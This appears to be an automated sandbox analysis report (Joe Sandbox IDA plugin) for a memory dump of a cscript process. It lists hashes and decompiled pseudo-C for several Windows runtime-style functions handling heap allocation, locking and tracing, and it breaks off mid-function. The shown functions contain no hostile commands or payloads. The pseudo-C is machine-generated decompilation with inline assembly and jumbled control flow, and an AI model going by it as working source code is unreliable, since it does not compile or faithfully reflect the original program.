Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82f5ebe92f69f7e7f68015b74752e1bea1489028044e064aaf3d7045b81ec7e2
Instruction ID: 497c38d141fbb7ef1c6268cacd772e3734adea39a25267920072f9521fe5490c
Opcode Fuzzy Hash: 82f5ebe92f69f7e7f68015b74752e1bea1489028044e064aaf3d7045b81ec7e2
Instruction Fuzzy Hash: 743102326052509BCB21DF59C949BABFBB6FFC5710F0444AFEA5607640CBB0D804CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 054EE730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E054EE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E054F9670() < 0) {
					L0550DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x55a7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L054D4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M054EE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x054ee730
0x054ee736
0x054ee738
0x054ee73d
0x054ee73e
0x054ee740
0x054ee749
0x054ee765
0x054ee76a
0x054ee76b
0x054ee76c
0x054ee76d
0x054ee76e
0x054ee76f
0x054ee775
0x054ee777
0x054ee77e
0x0552b675
0x054ee784
0x054ee784
0x054ee789
0x054ee7a8
0x054ee7ac
0x054ee807
0x054ee7ae
0x054ee7ae
0x054ee7b1
0x054ee7b4
0x054ee7b9
0x054ee7c0
0x054ee7c4
0x054ee7ca
0x054ee7cc
0x00000000
0x054ee7d3
0x054ee7d6
0x00000000
0x00000000
0x054ee7ff
0x054ee802
0x00000000
0x00000000
0x054ee7f9
0x054ee7fc
0x00000000
0x00000000
0x054ee7f3
0x054ee7f6
0x00000000
0x00000000
0x054ee7ed
0x054ee7f0
0x00000000
0x00000000
0x054ee7e7
0x054ee7ea
0x00000000
0x00000000
0x0552b685
0x0552b688
0x00000000
0x00000000
0x0552b682
0x00000000
0x00000000
0x054ee7cc
0x054ee7d9
0x054ee7dc
0x054ee7de
0x054ee7de
0x054ee7ac
0x054ee7e4
0x054ee74b
0x054ee751
0x054ee759
0x054ee761
0x054ee761

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a59b22e1ab10179fac4291bfe492b09eefd34cfb53a85606b1be018b7f2a2b
Instruction ID: 8da58159cd7796a70cfbb9d45b285251a03a39947da70acc836909fb91629966
Opcode Fuzzy Hash: 04a59b22e1ab10179fac4291bfe492b09eefd34cfb53a85606b1be018b7f2a2b
Instruction Fuzzy Hash: EA318075A14249EFD744CF58D845F9ABBE8FB09314F14825AF904CB341D631ED90CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 054EBC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E054EBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x55a6100; // 0x16
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E054D2280(0xd, 0x1ac3f1a0);
				_t41 =  *0x55a60f8; // 0x0
				if(_t41 != 0) {
					 *0x55a60f8 =  *_t41;
					 *0x55a60fc =  *0x55a60fc + 0xffff;
				}
				E054CFFB0(_t41, 0x800, 0x1ac3f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x55a60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L054D4620(0x55a6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x55a6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x054ebc36
0x054ebc42
0x054ebc45
0x054ebc4a
0x054ebd35
0x00000000
0x00000000
0x00000000
0x00000000
0x054ebc50
0x054ebc50
0x054ebc58
0x054ebc5a
0x054ebc60
0x00000000
0x00000000
0x0552a4f2
0x0552a4f6
0x00000000
0x00000000
0x00000000
0x0552a4fc
0x054ebc79
0x054ebc7e
0x054ebc86
0x054ebd16
0x054ebd20
0x054ebd20
0x054ebc8d
0x054ebc94
0x054ebcbd
0x054ebcca
0x054ebccb
0x054ebccc
0x054ebccd
0x054ebcce
0x054ebcd4
0x054ebcea
0x054ebcee
0x054ebcf2
0x054ebd00
0x054ebd04
0x00000000
0x054ebc96
0x054ebcab
0x054ebcaf
0x054ebd2c
0x054ebd2c
0x054ebd09
0x00000000
0x054ebd09
0x054ebcb1
0x054ebcb5
0x054ebcbb
0x00000000
0x00000000
0x00000000
0x054ebcbb

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d456de7d3724fe5f486ff845373a688607b0903446628461129b29a12abd824
Instruction ID: 461073abd2ee3d907bc7677660fb7414134c8760a5477aa45a8533031556d5f5
Opcode Fuzzy Hash: 5d456de7d3724fe5f486ff845373a688607b0903446628461129b29a12abd824
Instruction Fuzzy Hash: 1E310136A146169BCB01DF58D4C1BE677B5FF08312F0900BAEC45EB301EB78DA498B90

Uniqueness

Uniqueness Score: -1.00%

Function 054E1DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E054E1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E054DF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L054D4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E054DF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x054e1dc2
0x054e1dc5
0x054e1dc7
0x054e1dcc
0x054e1dce
0x054e1dd6
0x054e1ddf
0x054e1de0
0x054e1de1
0x054e1de5
0x054e1de8
0x054e1def
0x054e1df0
0x054e1df6
0x054e1df7
0x054e1dfe
0x054e1e1a
0x00000000
0x00000000
0x054e1e0b
0x054e1e12
0x054e1e12
0x054e1e00
0x054e1e00
0x054e1e05
0x054e1e1e
0x054e1e23
0x0552570f
0x05525713
0x00000000
0x00000000
0x05525719
0x05525719
0x054e1e2c
0x054e1e2d
0x054e1e2e
0x054e1e2f
0x054e1e31
0x054e1e32
0x054e1e35
0x054e1e3d
0x05525723
0x0552573d
0x0552573d
0x00000000
0x05525723
0x054e1e49
0x054e1e4e
0x054e1e4e
0x054e1e09
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 9af2cb388c07c373aa7d56d453dc8f80cf3c83231b4018ed3b777bcc5b308e45
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 68219F72640118FBC721CF99CC84EEBBBBDFF85681F154096F9069B650D634AE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054B9100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E054B9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x558f6e8);
				E0550D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E055888F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0550D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x55a86c0; // 0x36b07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x55a86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E054D2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E055888F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E054FAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x55ab1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x55a84c0;
										if(_t69 >=  *0x55a84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E05589063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E054B922A(_t82);
							_t53 = E054D7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E05588B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x55a86c0; // 0x36b07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x55a86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x55a86bc;
										_t72 = 0x55a86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E054B9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x55a86c4;
									_t72 = 0x55a86c0;
									L18:
									E054E9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x054b9100
0x054b9100
0x054b9100
0x054b9100
0x054b9102
0x054b9107
0x054b910c
0x054b9110
0x054b9115
0x054b9136
0x054b9143
0x055137e4
0x055137e4
0x054b9149
0x054b914e
0x054b914e
0x054b9117
0x054b911d
0x00000000
0x00000000
0x054b911f
0x054b9125
0x00000000
0x054b9151
0x054b9158
0x054b915d
0x054b9161
0x054b9168
0x05513715
0x00000000
0x054b916e
0x054b916e
0x054b9175
0x054b9177
0x054b917e
0x054b917f
0x054b9182
0x054b9182
0x054b9187
0x054b9187
0x054b918a
0x054b918d
0x054b918f
0x054b9192
0x054b9195
0x054b9198
0x054b9198
0x054b9198
0x054b919a
0x00000000
0x00000000
0x0551371f
0x05513721
0x05513727
0x0551372f
0x05513733
0x05513735
0x05513738
0x0551373b
0x0551373d
0x05513740
0x00000000
0x00000000
0x05513746
0x05513749
0x00000000
0x00000000
0x0551374f
0x05513751
0x00000000
0x00000000
0x05513757
0x05513759
0x0551375c
0x0551375c
0x0551375e
0x0551375e
0x05513761
0x05513764
0x00000000
0x00000000
0x05513766
0x05513768
0x055137a3
0x055137a3
0x055137a5
0x055137a7
0x055137ad
0x055137b0
0x055137b2
0x055137bc
0x055137c2
0x055137c2
0x055137b2
0x054b9187
0x054b9187
0x054b918a
0x054b918d
0x054b918f
0x054b9192
0x054b9195
0x00000000
0x054b9195
0x00000000
0x054b9187
0x0551376a
0x0551376a
0x0551376c
0x0551376c
0x0551376f
0x05513775
0x00000000
0x00000000
0x05513777
0x05513779
0x00000000
0x00000000
0x05513782
0x05513787
0x05513789
0x05513790
0x05513790
0x0551378b
0x0551378b
0x0551378b
0x05513792
0x05513795
0x05513795
0x05513798
0x05513798
0x0551379b
0x0551379b
0x054b91a3
0x054b91a9
0x054b91b0
0x054b91b4
0x054b91b4
0x054b91bb
0x054b91c0
0x054b91c5
0x054b91c7
0x055137da
0x054b91cd
0x054b91cd
0x054b91cd
0x054b91d2
0x054b91d5
0x054b9239
0x054b9239
0x054b91d7
0x054b91db
0x054b91e1
0x054b91e7
0x054b91fd
0x054b9203
0x054b921e
0x054b9223
0x00000000
0x054b9223
0x054b9205
0x054b9208
0x054b920c
0x054b9214
0x054b9214
0x054b91e9
0x054b91e9
0x054b91ee
0x054b91f3
0x054b91f3
0x054b91f3
0x054b91e7
0x00000000
0x054b91db
0x054b9187
0x054b9168

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe50bb6b5c45f81d289142218e4b4050642e077e94375587b54cbe356f27b415
Instruction ID: e2d407355274dcfbe870d1812cbef7f324b548f20223853cf2f5774195edb1c4
Opcode Fuzzy Hash: fe50bb6b5c45f81d289142218e4b4050642e077e94375587b54cbe356f27b415
Instruction Fuzzy Hash: 3731BE75A04285DFFB25DF68C08CBEDBBB2BB88310F18858BD50567341C7B0A980DB61

Uniqueness

Uniqueness Score: -1.00%

Function 054D0050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E054D0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x55ad360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E054E9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E054FB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E05588A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E054E9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x55ab1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x054d0055
0x054d005d
0x054d0062
0x054d006c
0x054d006f
0x054d0074
0x054d007a
0x054d007a
0x054d0080
0x054d0080
0x054d0087
0x054d008d
0x054d008f
0x054d0093
0x054d0095
0x054d009b
0x054d00f8
0x054d00fb
0x054d00fc
0x054d00ff
0x054d0108
0x054d0108
0x054d00a2
0x054d00a6
0x054d00b3
0x054d00bc
0x054d00c5
0x054d00ca
0x0551c01e
0x00000000
0x00000000
0x0551c02d
0x054d00d5
0x054d00d9
0x0551c03d
0x0551c046
0x0551c046
0x054d00df
0x054d00e2
0x054d00ea
0x054d00ef
0x054d00f2
0x054d00f6
0x054d0111
0x054d0117
0x054d0117
0x00000000
0x054d00f6
0x054d00d0
0x054d00d0
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4af97ad3d4ea2bfd81dcbfd2702b75bc064a2963b9623791320c28e434c6da2d
Instruction ID: 6d195cf51a9604c1e677b180bb455084f13ee5c0d86b4d1fb19679986dce0ca7
Opcode Fuzzy Hash: 4af97ad3d4ea2bfd81dcbfd2702b75bc064a2963b9623791320c28e434c6da2d
Instruction Fuzzy Hash: 76318231201B04DFD722CB28D854BABB7E5FF88714F14456EE59A87B90EB75A801CB60

Uniqueness

Uniqueness Score: -1.00%

Function 05536C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E05536C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E054D7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x55a7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L054D4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E054FF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E054D7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E054F9AE0();
						_t23 = L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x05536c0a
0x05536c0f
0x05536c10
0x05536c13
0x05536c15
0x05536c19
0x05536c1c
0x05536c21
0x05536c28
0x05536c3a
0x05536c2a
0x05536c33
0x05536c33
0x05536c3f
0x05536c48
0x05536c4d
0x05536c60
0x05536c65
0x05536c69
0x05536c73
0x05536c79
0x05536c7f
0x05536c86
0x05536c90
0x05536c94
0x05536ca6
0x05536cb2
0x05536cbd
0x05536cbd
0x05536cc3
0x05536cc7
0x05536ccb
0x05536cd0
0x05536cd1
0x05536ce2
0x05536ce2
0x05536c69
0x05536ced

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3322352e086c1bc1a3cc281fea10b97249d3f9535f8fcf39fbcce819f4ba90cc
Instruction ID: 4ad008da82fb741ac57d9029120da972e420ea09c741295a22754488db673a91
Opcode Fuzzy Hash: 3322352e086c1bc1a3cc281fea10b97249d3f9535f8fcf39fbcce819f4ba90cc
Instruction Fuzzy Hash: DB218BB1A00648BFC715DB69D894F6AB7B8FF48740F14006AF909D77A1D639ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 054F90AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E054F90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0550D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E054EE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L054D4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
